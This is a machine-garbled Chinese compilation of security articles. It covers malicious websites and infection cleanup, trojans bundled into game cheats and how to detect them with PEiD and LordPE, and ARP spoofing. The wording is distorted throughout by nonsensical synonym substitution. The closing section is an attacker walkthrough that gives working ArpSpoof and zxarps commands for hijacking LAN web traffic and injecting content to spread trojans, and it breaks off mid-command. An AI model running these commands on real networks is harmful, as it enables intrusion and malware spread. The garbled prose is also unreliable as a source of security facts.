本周，名为9166.biz的恶意网站进入了咱们的眼帘。多个安保论坛关于此疑问的求助帖激增，读者们的揭发信也川流不息，特意是一些局域网用户反映受此站攻打外部网络凌乱。咱们立刻对9166.biz做了考查，及等多个页面均挂有病毒。入侵系统后篡改阅读器及HOST文件，应用iframe嵌套代码造成关上任何网页时都会先读取此病毒，造成网速变慢甚至打不开网页。经过进一步的剖析发现，此病毒还有ARP攻打行为，局域网内用户一旦有一台电脑被入侵后将在全网疯狂流传实施ARP诈骗攻打，渣滓数据四窜，ping网关延迟，网速急剧降低，网内一切电脑都会被感化，杀毒软件不停报警可是不可彻底肃清。这让咱们想起了不久前暴虐网络的5y5.us、7y7.us和16a.us等恶性病毒，看来这个将主机设在境外的立功团伙还不铁心，又炮制出一个9166.biz继续危害网络。处置方法：因为这类病毒均是由ANI光标破绽蠕虫植入的，先下载装置MS07-17补丁。封锁IE阅读器及系统恢复配置，并清空一切暂时文件，删除HOST文件中的不明网址。并在路由器或IE受限地址中屏蔽9166.biz及对应IP。经常使用“ARP防火墙”（）肃清并修正被修正的网关MAC地址。wWw.ItCoMPuTeR.coM.Cn删除不明启动项，进入安保形式用360安捍卫士肃清被植入的恶意插件，杀毒软件全盘杀毒，假设杀毒软件不可启动，留意系统期间能否被合法篡改，最后片面修复IE。本周其余流氓网站3G播客网恶意链接： www.2cdma.cn/v?htm?tuitan2cdma

揭发人数：441危害水平 ★★★IP：58.52.161.203应用恶意手腕推行，二级页面嵌入病毒，弹出广告窗口。防范方法：清空IE暂时文件，删除不明启动项。进入安保形式用黄山IE修复专家清算，最后全盘杀毒。jygame88.com恶意链接：揭发人数：392危害水平 ★★★IP：61.188.38.155首页嵌有病毒，二级目录中藏有盗取网游“征途”账户的木马。更气人的是页面还搁置了统计系统，记载受感化人数及IP地址。防范方法：封锁系统恢复配置，屏蔽此站域名及IP，删除不明启动项，清空暂时文件夹。进入安保形式经常使用360文件粉碎机强迫删除以下文件（显示暗藏文件）C:\WINDOWS\Microsoft\rundll32.exe、C:\program files\internet explorer\use6.dll、C:\WINDOWS\system32\dt.dll，用360安捍卫士肃清并修复被植入的恶意插件及HOST文件，最后全盘杀毒。

如何防止外挂盗装备 如今网游十分盛行，经常有玩家装备被盗！如今一些网游玩家很塌实，他们为了极速提高自己的游戏级别，要么请人协助自己启动游戏代练，要么罗唆经常使用网络游戏外挂启动操作。然而当玩家正在为自己的级别沾沾自喜的时刻，他们的游戏账号、游戏装备等虚构财富侧面临着被盗走的风险。如今无论是国际的还是国外的网络游戏推出后不久，很快就会产生相应的游戏外挂。游戏玩家之所以青眼各种各样的游戏外挂，重要就是它们可以协助自己在游戏中极速覆灭死敌、迅速优化游戏级别。网络游戏外挂是一种修正游戏系统并且对主机启动诈骗的舞弊程序。它间接作用于网络游戏主程序，成功减速、看血、封包等目标。为了能够在网络游戏中极速取得较高的等级，很多玩家经过这种舞弊程序来启动游戏。同时，在取得较初等级的同时，取得极品装备的几率也提高了。只管大少数网络游戏外挂自身没有危害性，然而为了偷窃玩家的虚构装备等虚构财富，很多网络盗贼会应用木马捆绑工具将游戏外挂捆绑上木马。当游戏玩家运转游戏外挂后就会成功激活木马程序，而后网络盗贼就会应用木马程序来偷盗玩家账户。因此关于那些想经过游戏外挂来投机取巧的玩家来说，经常“是偷鸡不成蚀把米”，刚刚更新到的游戏账号或初级装备，就成为网络盗贼的“囊中之物”。有数据显示，80%以上的游戏玩家经常使用过各种各样的游戏外挂，而在这些人群中就有60%的玩家因此造成游戏账号和装备失落。实在案例再现受益人：刘星损失金额：游戏装备＋上网期间＋消耗精神≈1000元人民币刘星是个《热血江湖》游戏迷，苦于游戏水平有限迟迟不能升到较初级别，因此他在一些玩家的揭示下，预备应用游戏外挂来极速优化自己的游戏级别。他经过搜查引擎找到了很多《热血江湖》游戏外挂，经过经常使用该游戏外挂刘星发现，自己岂但移动速度比以前快了，而且经常可以延迟发现对方并覆灭之。没过多久，刘星的游戏人物等级提高了，同时，他还在游戏中取得了一个价值不菲的“潜能戒指”。没过多久当刘星再次登录《热血江湖》的账号后，居然发现自己的潜能戒指、刀、衣服、护手、耳环等装备都不翼而飞，这些装备在网上能够卖到上千元人民币。也就是说，刘星相当于损失了上千元的钱财。案例解剖各种各样的游戏外挂层出不穷，甚至很多人经过编写游戏外挂来卖钱。可是这些人很多都不满足经过贩卖游戏外挂来赚钱，所以它们在贩卖的游戏外挂上捆绑木马程序，经过木马程序盗取玩家的游戏账号来转移游戏装备等虚构财富。当然也有其他人在取得某款干流网络游戏的外挂程序后，在把它捆绑抢先戏木马后，再经过游戏论坛、游戏网站等多种渠道颁布进来，从而成功窃取网络玩家的账号明码消息。更有甚者在编写游戏外挂的时刻，间接在源代码外面减少上后门代码，在玩家登录游戏账号的时刻记载账号明码。开局网络盗贼不盗你的号，等到玩家的级别高了后，再盗取价值不菲的极品装备。两规律防范外挂盗号针对网络盗贼应用游戏外挂启动游戏账号、游戏装备等的偷盗行为，各位游戏玩家可以应用上方两条规律启动相应的防范。第一规律：不要用任何游戏外挂不论是网络游戏还是单机游戏，都是用来给人们文娱消遣的，想应用外挂投机取巧来取得高的游戏级别，岂但会被人所轻视，成为游戏经营商严打的对象，同时存在被盗取账号的风险。所以玩家应该本着轻松游戏、偏心游戏的准则，同时为自身账号及角色安保着想，远离游戏外挂。因为局部网友曾经下载或经常使用了所谓的外挂程序，只管自己目前游戏账号依然完整，然而最好马上更改游戏登录明码，这样可以保障账号的安保；立刻彻底卸载外挂程序，防止外挂自带的后门启动账号偷盗；立刻便用正版杀毒软件启动杀毒，从而有效肃清系统中的木马程序。第二规律：检测下载文件安保性假设你曾经下载了游戏外挂，想知道它能否捆绑了木马，该怎样办？咱们可以应用PEID、LordPE等工具（以上工具均可以在下载），对游戏外挂启动检测。别离外挂能否捆绑木马咱们首先应用PEID（下载地址：）这款工具来启动检测，相熟文件破解的用户都知道，PEID是一款弱小的查壳工具，其智能脱壳器插件可以应答如今大局部的软件脱壳义务。运转PEID后点击“文件”选项后的按钮，从弹出的窗口选用要检测的可疑程序，如今咱们来操作工具的审核结果。不论PEID检测出程序经常使用什么壳启动的加密，只需是在检测结果外面发现了有“[Overlay]”这样的结果，那么就说明这个程序被捆绑了其余的文件。假设用户要运转这个程序的话，那么就必定要提高警觉。PEID软件可以查很多的壳消息，有的可以间接查找出带有捆绑的文件，有的则要启动深度或许外围扫描能力查找出带有捆绑的文件。假设没有产生这样的字样的话，还可以点击“裁减”按钮中的“深度扫描”命令再次启动检测。假设真的没有产生相似字样的话，就示意这个文件是安保的。接上去咱们应用另一款名为LordPE（下载地址：）的工具来启动检测。运转LordPE后点击“PE编辑器”按钮来选用须要检查的文件，确定文件后程序会智能弹出一个“PE编辑”窗口。点击窗口“目录”按钮后，在弹出的“目录表”窗口中点击“导入表”前面的按钮，而后在弹出的“导入表”窗口中的“DLL文件”列表中启动查找。假设列表中只要一个USER32文件的话，那么普通都可以安心启动经常使用，假设要是文件带有两个USER32文件的话，那么就示意这个文件被启动过捆绑操作。这里要对用户特意强调的是，应用LordPE工具启动检测，其准确度比不上应用PEID检测的准确度。所以大家在启动文件捆绑检测的时刻最好将两种方法配合经常使用，毕竟这两种方法只须要点击几下鼠标即可。 如何防止arp诈骗

近期一种新型的“地址解析协定诈骗”（简称：ARP诈骗）攻打手腕正在校园网中分散，重大影响了包含校园网的各种类型局域网的反常运转。黑客经过伪造一个假的网关启动木马的散播，让局域网内的用户一上网就会衔接有木马的地址，而用户惟一的觉得只是网络不疏通。那么ARP 诈骗是怎样的一种黑客攻打手腕？普通的用户又该如何防范ARP 诈骗攻打呢？“ARP 诈骗”的形式和原理从影响网络衔接通顺的形式来看，ARP 诈骗大略可以分为两种。一种是对路由器ARP表的诈骗，这种方法可以破坏系统的ARP缓存表，从而形成内外IP地址的凌乱。另一种是对局域网外面计算机的网关诈骗，让内网计算机系统的数据包经过假网关来发送。第一种ARP 诈骗的原理是截获网关数据。它通知路由器一系列失误的内网MAC地址，并依照必定的频率始终启动地址的改换，使实在的地址消息不可经过更新保留在路由器中，结果路由器的一切数据只能发送给失误的MAC地址，从而形成计算机访问黑客精心构建的网络圈套。第二种ARP 诈骗的原理是伪造网关。它的原理是建设假网关，让被它诈骗的计算机向假网关发数据，而不是经过反常的路由器路径上网。在用户的角度看来，就是上不了网了以及网络掉线了，这样会给用户形成系统网关出错的假象。如何应用“ARP 诈骗”入侵黑客要启动ARP 诈骗入侵只须要一个前提条件，就是启动入侵的计算机和被攻打的计算机要在一个局域网的网段中。因为ARP 诈骗是经过数据包启动诈骗的，所以在启动操作以前要在本地计算机装置一个驱动程序WinPcap（图1）。关上系统的命令揭示符命令，并切换到应用工具所在的目录，接着口头应用工具命令：arpspoof.exe /n，而后会生成一个文本文件。如今关上这个文本文件后依照自己的需求启动编辑，比如可以将“Hack by cooldiyer”改为“该系统曾经被我成功入侵！”（图2）。在命令揭示符窗口输入命令：ArpSpoof 192.168.1.6 192.168.1.3 80 2 1 /r job.txt，其中192.168.1.6示意入侵计算机的IP地址，192.168.1.3示意被入侵计算机的IP地址，80示意用于诈骗的远程端口。前面的关系参数设置，用户应该依据自己网络网关的实践类型（例如有些网关地址为192.168.0.1，有些则是192.168. 110.1）状况启动设置。当准确键入以上命令后回车，程序就可以启动ARP 诈骗攻打（图3）。当其余用户访问这台主机的80端口后，从阅读器看到的就是咱们文本文件中的内容。刚才只是应用ARP 诈骗启动了网站攻打，如今应用另一款诈骗工具启动木马流传。在命令揭示符窗口检查ARP 诈骗工具zxarps.exe的经常使用方法，而后键入命令：zxarps.exe -idx 0 -ip 192.168.1.7-192.168. 1.255 -port 80 -insert “

From: